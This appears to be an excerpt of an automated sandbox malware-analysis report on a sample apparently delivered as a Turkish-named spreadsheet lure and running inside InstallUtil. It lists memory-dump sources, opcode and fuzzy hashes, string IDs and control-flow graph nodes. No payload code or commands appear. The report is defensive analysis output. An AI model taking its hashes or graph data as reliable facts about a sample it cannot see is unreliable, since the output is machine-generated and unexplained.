                                                  • Instruction Fuzzy Hash: 4321D3B1E056188BEB18CFABD9447DDFAFBAFC8300F04C06AD519AA254DB7409468F40
                                                  Function 05B13134 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f055f78fa743a25cfab2e6c813f7dff181988898e98034b4a26bd8d2365fc7ca
                                                  • Instruction ID: 995cbb9cc6253322a6fbc37cfc3d89671cdda8129e688224bc5b5d25acf28160
                                                  • Opcode Fuzzy Hash: f055f78fa743a25cfab2e6c813f7dff181988898e98034b4a26bd8d2365fc7ca
                                                  • Instruction Fuzzy Hash: 3611C43251DBE18FC7468738852D285BFF0DF132147BA90DEC984DF663D2256916CB89
                                                  Function 05AEE898 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: edc7e8b44167065481126ac6303b543cb688d238c5b723fba57c0f2bcdf0a432
                                                  • Instruction ID: 7be454211219c20e99ed5f00216c849575762cdee09fd624266687e6eff41eb4
                                                  • Opcode Fuzzy Hash: edc7e8b44167065481126ac6303b543cb688d238c5b723fba57c0f2bcdf0a432
                                                  • Instruction Fuzzy Hash: D221C3B1D056189BEB18CF6BD9847DEFAFBBFC8300F14C06AD409AA264EB7409458F51
                                                  Function 05B13C40 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89c3ecd6c44fe259a2c7e7880be6dfe8f28f06a6e9d294797c3810bc077066c1
                                                  • Instruction ID: 0d6249b432d9c988078899e39b5f5fa233496ecc9e87f26091e229b1030a9b64
                                                  • Opcode Fuzzy Hash: 89c3ecd6c44fe259a2c7e7880be6dfe8f28f06a6e9d294797c3810bc077066c1
                                                  • Instruction Fuzzy Hash: 021107B1D146188BEB58CFABC84579EFAFBABC8300F14C57AD818A7255EB705546CF40
                                                  Function 05AE51A0 Relevance: 5.2, Strings: 4, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (_]q$(_]q$(_]q$(_]q
                                                  • API String ID: 0-2651352888
                                                  • Opcode ID: f417f25481d7234fef1882fd0c32935b92c9f197db5df0397f3b4833a1d59c5a
                                                  • Instruction ID: df4cc22d86d773bcf2e5ece5912da9b5e6874566871dc30cd462044674b0fb9d
                                                  • Opcode Fuzzy Hash: f417f25481d7234fef1882fd0c32935b92c9f197db5df0397f3b4833a1d59c5a
                                                  • Instruction Fuzzy Hash: B771B375F042048FC704AF78E4959AE7FB6EF8A308B5584A9D406DB3A1DB31EC46CB90
                                                  Function 057E6B25 Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -$2$5$t
                                                  • API String ID: 0-3752484981
                                                  • Opcode ID: 652128084f65f9757f2e3a4006a4c31eed88ae52eb39ef9b2c476dcafa69f9ba
                                                  • Instruction ID: b03596e4607a404d1472bce13a2958b9d9b0ff2e48886b6c6502014d5b4e749c
                                                  • Opcode Fuzzy Hash: 652128084f65f9757f2e3a4006a4c31eed88ae52eb39ef9b2c476dcafa69f9ba
                                                  • Instruction Fuzzy Hash: B41180B4915228CFDB22DFA4D988B9DBBB2BB0C315F246299D009A7242C7749984DF14

                                                  Execution Graph

                                                  Execution Coverage:17.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:23.3%
                                                  Total number of Nodes:30
                                                  Total number of Limit Nodes:7
                                                  execution_graph 19821 6449c70 19822 6449c9d 19821->19822 19824 644bb7f 19822->19824 19826 6449fa6 19822->19826 19827 6449328 19822->19827 19825 6449328 2 API calls 19825->19826 19826->19824 19826->19825 19828 644933a 19827->19828 19830 644933f 19827->19830 19828->19826 19829 644957e LdrInitializeThunk 19833 6449619 19829->19833 19830->19828 19830->19829 19831 64496d9 19831->19826 19832 6449a69 LdrInitializeThunk 19832->19831 19833->19831 19833->19832 19834 105e018 19835 105e024 19834->19835 19838 6442568 19835->19838 19839 644258a 19838->19839 19840 105e0c3 19839->19840 19843 6449328 2 API calls 19839->19843 19844 644992c 19839->19844 19850 6449548 19839->19850 19843->19840 19845 64497e3 19844->19845 19846 6449924 LdrInitializeThunk 19845->19846 19849 6449328 2 API calls 19845->19849 19848 6449a81 19846->19848 19848->19840 19849->19845 19851 644957e LdrInitializeThunk 19850->19851 19852 6449579 19850->19852 19854 6449619 19851->19854 19852->19851 19853 64496d9 19853->19840 19854->19853 19855 6449924 LdrInitializeThunk 19854->19855 19857 6449328 2 API calls 19854->19857 19855->19853 19857->19854

                                                  Executed Functions

                                                  Function 01059DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$4']q$4']q$4']q
                                                  • API String ID: 0-875651895
                                                  • Opcode ID: 252dfc7bcd73b6fc4bb02f94128b0b8e6fcbea71ebaafb304ce80eca9b6ce469
                                                  • Instruction ID: 380c8a0ba127de36151f72da9f9bd99a1130f947c8f8cf9faa98d09a202ec314
                                                  • Opcode Fuzzy Hash: 252dfc7bcd73b6fc4bb02f94128b0b8e6fcbea71ebaafb304ce80eca9b6ce469
                                                  • Instruction Fuzzy Hash: 99A28E30B04209CFCB55CF68C584AAFBBF2FF88310F158699E9859B266D735E941CB61
                                                  Function 010569A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$Haq
                                                  • API String ID: 0-903699183
                                                  • Opcode ID: 7ef8ee47bf0b9806d8421e8813692eeba551da28e3759d45706f48de71fb1586
                                                  • Instruction ID: 3f27c661bc19b04240c7beac309fa01dc39e896ebbf1cd45fd34360dd3f4e0f6
                                                  • Opcode Fuzzy Hash: 7ef8ee47bf0b9806d8421e8813692eeba551da28e3759d45706f48de71fb1586
                                                  • Instruction Fuzzy Hash: 2012BC70A002198FDB55DF69C854AAFBBF6BF88300F208469E985DB395DF359D42CB90
                                                  Function 0105C147 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2362 105c147-105c158 2363 105c184 2362->2363 2364 105c15a-105c172 2362->2364 2365 105c186-105c18a 2363->2365 2368 105c174-105c179 2364->2368 2369 105c17b-105c17e 2364->2369 2368->2365 2370 105c180-105c182 2369->2370 2371 105c18b-105c199 2369->2371 2370->2363 2370->2364 2373 105c1a5-105c1a8 2371->2373 2374 105c19b-105c19d 2371->2374 2376 105c1a9-105c1ac 2373->2376 2375 105c19f-105c1a1 2374->2375 2374->2376 2377 105c1a3 2375->2377 2378 105c1ad-105c1c8 2375->2378 2376->2378 2377->2373 2379 105c1cf-105c2ac call 10541a0 call 1053cc0 2378->2379 2380 105c1ca 2378->2380 2390 105c2b3-105c2d4 call 1055658 2379->2390 2391 105c2ae 2379->2391 2380->2379 2393 105c2d9-105c2e4 2390->2393 2391->2390 2394 105c2e6 2393->2394 2395 105c2eb-105c2ef 2393->2395 2394->2395 2396 105c2f4-105c2fb 2395->2396 2397 105c2f1-105c2f2 2395->2397 2398 105c302-105c310 2396->2398 2399 105c2fd 2396->2399 2400 105c313-105c357 2397->2400 2398->2400 2399->2398 2404 105c3bd-105c3d4 2400->2404 2406 105c3d6-105c3fb 2404->2406 2407 105c359-105c36f 2404->2407 2414 105c413 2406->2414 2415 105c3fd-105c412 2406->2415 2411 105c371-105c37d 2407->2411 2412 105c399 2407->2412 2416 105c387-105c38d 2411->2416 2417 105c37f-105c385 2411->2417 2413 105c39f-105c3bc 2412->2413 2413->2404 2415->2414 2418 105c397 2416->2418 2417->2418 2418->2413
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: 86cf382509fb381057f538c4d96331742c44bc4961ccff6b993262c673a19262
                                                  • Instruction ID: 6a11a75cc4a96b9cb04b2940b58a6102bf8a1a9eaaa093ad771fccaa3850256d
                                                  • Opcode Fuzzy Hash: 86cf382509fb381057f538c4d96331742c44bc4961ccff6b993262c673a19262
                                                  • Instruction Fuzzy Hash: 4EA1E974E00258CFEB54CFA9D984A9EBBF6FF89310F148069E848AB365DB309941CF50
                                                  Function 0105D278 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2422 105d278-105d2a8 2423 105d2af-105d38c call 10541a0 call 1053cc0 2422->2423 2424 105d2aa 2422->2424 2434 105d393-105d3b4 call 1055658 2423->2434 2435 105d38e 2423->2435 2424->2423 2437 105d3b9-105d3c4 2434->2437 2435->2434 2438 105d3c6 2437->2438 2439 105d3cb-105d3cf 2437->2439 2438->2439 2440 105d3d4-105d3db 2439->2440 2441 105d3d1-105d3d2 2439->2441 2443 105d3e2-105d3f0 2440->2443 2444 105d3dd 2440->2444 2442 105d3f3-105d437 2441->2442 2448 105d49d-105d4b4 2442->2448 2443->2442 2444->2443 2450 105d4b6-105d4db 2448->2450 2451 105d439-105d44f 2448->2451 2458 105d4f3 2450->2458 2459 105d4dd-105d4f2 2450->2459 2455 105d451-105d45d 2451->2455 2456 105d479 2451->2456 2460 105d467-105d46d 2455->2460 2461 105d45f-105d465 2455->2461 2457 105d47f-105d49c 2456->2457 2457->2448 2459->2458 2462 105d477 2460->2462 2461->2462 2462->2457
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: f115d75858b9b2bf6812737838f2c7ee3b378750c0bb3619a1b4c29bee1dadf7
                                                  • Instruction ID: 26138cbef96da6401f0ae9201571c4b698c7f06ef0d7b6a17b3e499ace5caf28
                                                  • Opcode Fuzzy Hash: f115d75858b9b2bf6812737838f2c7ee3b378750c0bb3619a1b4c29bee1dadf7
                                                  • Instruction Fuzzy Hash: 1B819574E00258CFDB54DFAAD854A9EBBF2BF89300F14C06AD859AB365DB309945CF50
                                                  Function 0105CA08 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2466 105ca08-105ca38 2468 105ca3f-105cb1c call 10541a0 call 1053cc0 2466->2468 2469 105ca3a 2466->2469 2479 105cb23-105cb44 call 1055658 2468->2479 2480 105cb1e 2468->2480 2469->2468 2482 105cb49-105cb54 2479->2482 2480->2479 2483 105cb56 2482->2483 2484 105cb5b-105cb5f 2482->2484 2483->2484 2485 105cb64-105cb6b 2484->2485 2486 105cb61-105cb62 2484->2486 2488 105cb72-105cb80 2485->2488 2489 105cb6d 2485->2489 2487 105cb83-105cbc7 2486->2487 2493 105cc2d-105cc44 2487->2493 2488->2487 2489->2488 2495 105cc46-105cc6b 2493->2495 2496 105cbc9-105cbdf 2493->2496 2502 105cc83 2495->2502 2503 105cc6d-105cc82 2495->2503 2500 105cbe1-105cbed 2496->2500 2501 105cc09 2496->2501 2504 105cbf7-105cbfd 2500->2504 2505 105cbef-105cbf5 2500->2505 2506 105cc0f-105cc2c 2501->2506 2503->2502 2507 105cc07 2504->2507 2505->2507 2506->2493 2507->2506
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: 76a8a3bed603c462ad2bba9f895e772aa5cc50d6bf2905a407da9b42ce7dc345
                                                  • Instruction ID: dc18e4f2a69f6764ca0526594820e2fb500461c92d73157a0eb998205df8be60
                                                  • Opcode Fuzzy Hash: 76a8a3bed603c462ad2bba9f895e772aa5cc50d6bf2905a407da9b42ce7dc345
                                                  • Instruction Fuzzy Hash: 4681C674E00258CFEB54DFAAD944A9EBBF2BF89300F14C069E858AB365DB309945CF50
                                                  Function 01055370 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2511 1055370-10553a0 2512 10553a7-1055484 call 10541a0 call 1053cc0 2511->2512 2513 10553a2 2511->2513 2523 1055486 2512->2523 2524 105548b-10554a9 2512->2524 2513->2512 2523->2524 2554 10554ac call 1055649 2524->2554 2555 10554ac call 1055658 2524->2555 2525 10554b2-10554bd 2526 10554c4-10554c8 2525->2526 2527 10554bf 2525->2527 2528 10554cd-10554d4 2526->2528 2529 10554ca-10554cb 2526->2529 2527->2526 2531 10554d6 2528->2531 2532 10554db-10554e9 2528->2532 2530 10554ec-1055530 2529->2530 2536 1055596-10555ad 2530->2536 2531->2532 2532->2530 2538 1055532-1055548 2536->2538 2539 10555af-10555d4 2536->2539 2543 1055572 2538->2543 2544 105554a-1055556 2538->2544 2545 10555d6-10555eb 2539->2545 2546 10555ec 2539->2546 2549 1055578-1055595 2543->2549 2547 1055560-1055566 2544->2547 2548 1055558-105555e 2544->2548 2545->2546 2550 1055570 2547->2550 2548->2550 2549->2536 2550->2549 2554->2525 2555->2525
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: e97734002d300be87ecae603114bc16b884d56699d249d2bc14935b8e3078e11
                                                  • Instruction ID: 5c33af2f7b176fc3aee4c812ca42947b5d2926f8721e341ff25f0be3fdbc4047
                                                  • Opcode Fuzzy Hash: e97734002d300be87ecae603114bc16b884d56699d249d2bc14935b8e3078e11
                                                  • Instruction Fuzzy Hash: 0181B274E00218CFDB54DFAAD994A9EBBF2FF88300F148069E849AB365DB309945CF50
                                                  Function 0105CCD8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2556 105ccd8-105cd08 2557 105cd0f-105cdec call 10541a0 call 1053cc0 2556->2557 2558 105cd0a 2556->2558 2568 105cdf3-105ce14 call 1055658 2557->2568 2569 105cdee 2557->2569 2558->2557 2571 105ce19-105ce24 2568->2571 2569->2568 2572 105ce26 2571->2572 2573 105ce2b-105ce2f 2571->2573 2572->2573 2574 105ce34-105ce3b 2573->2574 2575 105ce31-105ce32 2573->2575 2577 105ce42-105ce50 2574->2577 2578 105ce3d 2574->2578 2576 105ce53-105ce97 2575->2576 2582 105cefd-105cf14 2576->2582 2577->2576 2578->2577 2584 105cf16-105cf3b 2582->2584 2585 105ce99-105ceaf 2582->2585 2591 105cf53 2584->2591 2592 105cf3d-105cf52 2584->2592 2589 105ceb1-105cebd 2585->2589 2590 105ced9 2585->2590 2593 105cec7-105cecd 2589->2593 2594 105cebf-105cec5 2589->2594 2595 105cedf-105cefc 2590->2595 2592->2591 2596 105ced7 2593->2596 2594->2596 2595->2582 2596->2595
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: 73f04e40f75e86d32bb9d840c29038fd19f493d8348c904c038e36307c95958a
                                                  • Instruction ID: 24ae0cf0b6caa7634a002456f399bc4179bbc1e8a4e5c4dc4c40e6a4a9e038cf
                                                  • Opcode Fuzzy Hash: 73f04e40f75e86d32bb9d840c29038fd19f493d8348c904c038e36307c95958a
                                                  • Instruction Fuzzy Hash: C481C774E00258CFEB54DFAAD944A9EBBF2BF89300F14C069E849AB365DB305945CF50
                                                  Function 0105C738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2644 105c738-105c768 2645 105c76f-105c84c call 10541a0 call 1053cc0 2644->2645 2646 105c76a 2644->2646 2656 105c853-105c874 call 1055658 2645->2656 2657 105c84e 2645->2657 2646->2645 2659 105c879-105c884 2656->2659 2657->2656 2660 105c886 2659->2660 2661 105c88b-105c88f 2659->2661 2660->2661 2662 105c894-105c89b 2661->2662 2663 105c891-105c892 2661->2663 2665 105c8a2-105c8b0 2662->2665 2666 105c89d 2662->2666 2664 105c8b3-105c8f7 2663->2664 2670 105c95d-105c974 2664->2670 2665->2664 2666->2665 2672 105c976-105c99b 2670->2672 2673 105c8f9-105c90f 2670->2673 2679 105c9b3 2672->2679 2680 105c99d-105c9b2 2672->2680 2677 105c911-105c91d 2673->2677 2678 105c939 2673->2678 2681 105c927-105c92d 2677->2681 2682 105c91f-105c925 2677->2682 2683 105c93f-105c95c 2678->2683 2680->2679 2684 105c937 2681->2684 2682->2684 2683->2670 2684->2683
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: f5e8190239c56c10e71afd3dc93e30f0cc9bcb009549671e6a23aa2842b325d0
                                                  • Instruction ID: 019d5d8f14813e57005c554d91d729e2c2b7b7db4a022ba132e1343a57817c9a
                                                  • Opcode Fuzzy Hash: f5e8190239c56c10e71afd3dc93e30f0cc9bcb009549671e6a23aa2842b325d0
                                                  • Instruction Fuzzy Hash: 3781B474E00258CFEB54DFAAD984A9EBBF2BF89310F14C069D858AB365DB309941CF50
                                                  Function 0105C472 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: 191a81213f8c22215cf86078c348b8de62c2790618e758ee550a57312970723a
                                                  • Instruction ID: 5a5872c0df2423d24b5c1d92733b80f34a1428f3bb67d089ab602a5f143555e6
                                                  • Opcode Fuzzy Hash: 191a81213f8c22215cf86078c348b8de62c2790618e758ee550a57312970723a
                                                  • Instruction Fuzzy Hash: 4E81B774E00258CFEB54DFAAD944A9EBBF2BF88300F14D069D859AB365DB309985CF50
                                                  Function 0105E97A Relevance: .2, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1271b6574ba506fc8d1456eb5f49392189b2c6b6468df6da79363434be378bfe
                                                  • Instruction ID: 5b854959ce26e97382c4f76e2b0b55ad5e8e4bcad182be3da759b68acce2bb18
                                                  • Opcode Fuzzy Hash: 1271b6574ba506fc8d1456eb5f49392189b2c6b6468df6da79363434be378bfe
                                                  • Instruction Fuzzy Hash: FF51C574E00208DFDB48DFAAD544A9EBBB2FF89300F24C069E859AB365DB345942CF14
                                                  Function 0105E988 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94cddb2af4c8cf1841ba5cfa181a2d29a0df654526fe766fac0f9c7aed8a6c49
                                                  • Instruction ID: 778006f04adfa943fb003cdcffce68f2dfa433182f152adeb0dd75e853531d89
                                                  • Opcode Fuzzy Hash: 94cddb2af4c8cf1841ba5cfa181a2d29a0df654526fe766fac0f9c7aed8a6c49
                                                  • Instruction Fuzzy Hash: 5F519274E00208DFDB58DFAAD594A9EFBB6FF89300F208429E819AB365DB345945CF14
                                                  Function 010576F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 10576f1-1057725 1 1057b54-1057b58 0->1 2 105772b-105774e 0->2 3 1057b71-1057b7f 1->3 4 1057b5a-1057b6e 1->4 11 1057754-1057761 2->11 12 10577fc-1057800 2->12 9 1057b81-1057b96 3->9 10 1057bf0-1057c05 3->10 20 1057b9d-1057baa 9->20 21 1057b98-1057b9b 9->21 22 1057c07-1057c0a 10->22 23 1057c0c-1057c19 10->23 28 1057770 11->28 29 1057763-105776e 11->29 13 1057802-1057810 12->13 14 1057848-1057851 12->14 13->14 36 1057812-105782d 13->36 17 1057c67 14->17 18 1057857-1057861 14->18 30 1057c6c-1057c9c 17->30 18->1 26 1057867-1057870 18->26 24 1057bac-1057bed 20->24 21->24 25 1057c1b-1057c56 22->25 23->25 78 1057c5d-1057c64 25->78 34 1057872-1057877 26->34 35 105787f-105788b 26->35 31 1057772-1057774 28->31 29->31 63 1057cb5-1057cbc 30->63 64 1057c9e-1057cb4 30->64 31->12 37 105777a-10577dc 31->37 34->35 35->30 40 1057891-1057897 35->40 59 105782f-1057839 36->59 60 105783b 36->60 89 10577e2-10577f9 37->89 90 10577de 37->90 43 105789d-10578ad 40->43 44 1057b3e-1057b42 40->44 57 10578c1-10578c3 43->57 58 10578af-10578bf 43->58 44->17 48 1057b48-1057b4e 44->48 48->1 48->26 61 10578c6-10578cc 57->61 58->61 62 105783d-105783f 59->62 60->62 61->44 65 10578d2-10578e1 61->65 62->14 66 1057841 62->66 72 10578e7 65->72 73 105798f-10579ba call 1057538 * 2 65->73 66->14 76 10578ea-10578fb 72->76 91 1057aa4-1057abe 73->91 92 10579c0-10579c4 73->92 76->30 80 1057901-1057913 76->80 80->30 82 1057919-1057931 80->82 145 1057933 call 1057cc1 82->145 146 1057933 call 1057cd0 82->146 85 1057939-1057949 85->44 88 105794f-1057952 85->88 93 1057954-105795a 88->93 94 105795c-105795f 88->94 89->12 90->89 91->1 114 1057ac4-1057ac8 91->114 92->44 96 10579ca-10579ce 92->96 93->94 97 1057965-1057968 93->97 94->17 94->97 99 10579f6-10579fc 96->99 100 10579d0-10579dd 96->100 101 1057970-1057973 97->101 102 105796a-105796e 97->102 103 1057a37-1057a3d 99->103 104 10579fe-1057a02 99->104 117 10579ec 100->117 118 10579df-10579ea 100->118 101->17 105 1057979-105797d 101->105 102->101 102->105 107 1057a3f-1057a43 103->107 108 1057a49-1057a4f 103->108 104->103 106 1057a04-1057a0d 104->106 105->17 111 1057983-1057989 105->111 112 1057a1c-1057a32 106->112 113 1057a0f-1057a14 106->113 107->78 107->108 115 1057a51-1057a55 108->115 116 1057a5b-1057a5d 108->116 111->73 111->76 112->44 113->112 120 1057b04-1057b08 114->120 121 1057aca-1057ad4 call 10563e0 114->121 115->44 115->116 122 1057a92-1057a94 116->122 123 1057a5f-1057a68 116->123 119 10579ee-10579f0 117->119 118->119 119->44 119->99 120->78 126 1057b0e-1057b12 120->126 121->120 134 1057ad6-1057aeb 121->134 122->44 124 1057a9a-1057aa1 122->124 129 1057a77-1057a8d 123->129 130 1057a6a-1057a6f 123->130 126->78 131 1057b18-1057b25 126->131 129->44 130->129 137 1057b34 131->137 138 1057b27-1057b32 131->138 134->120 142 1057aed-1057b02 134->142 139 1057b36-1057b38 137->139 138->139 139->44 139->78 142->1 142->120 145->85 146->85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                  • API String ID: 0-1435242062
                                                  • Opcode ID: 395c7d6d8a8d8286ba4e41a0883f165c60031d7188115c81d7a9c57697a8fab9
                                                  • Instruction ID: 80ed369fce22fef136538ff7c23a078985a7ff60a5b37204ec256acb95cbb124
                                                  • Opcode Fuzzy Hash: 395c7d6d8a8d8286ba4e41a0883f165c60031d7188115c81d7a9c57697a8fab9
                                                  • Instruction Fuzzy Hash: F9128C30A002098FDB95CF68D984AAEBBF6FF89314F548599E985DB362D730ED41CB50
                                                  Function 01055F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
